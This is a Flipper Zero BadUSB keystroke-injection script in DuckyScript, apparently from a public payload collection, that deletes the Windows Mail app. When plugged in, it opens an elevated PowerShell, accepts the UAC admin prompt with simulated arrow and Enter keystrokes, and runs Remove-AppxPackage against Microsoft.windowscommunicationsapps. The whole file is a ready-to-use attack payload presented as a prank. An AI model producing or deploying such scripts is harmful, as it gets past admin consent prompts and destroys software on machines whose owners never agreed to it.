Flipper/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/MoreSeriousFUN/DeleteWindowsMail/DeleteWindowsMail.txt
2024-04-15 23:47:39 -07:00

20 lines
426 B
Plaintext

REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
REM Description: Deletes the Windows Mail app.
REM Version: 1.0
REM Category: Fun
DELAY 500
GUI r
DELAY 300
REM Start PowerShell as Admin
STRING powershell Start-Process powershell -Verb runAs
DELAY 300
ENTER
DELAY 500
LEFTARROW
DELAY 450
ENTER
DELAY 600
REM Deletes Windows Mail app
STRING AppxPackage Microsoft.windowscommunicationsapps | Remove-AppxPackage
DELAY 200
ENTER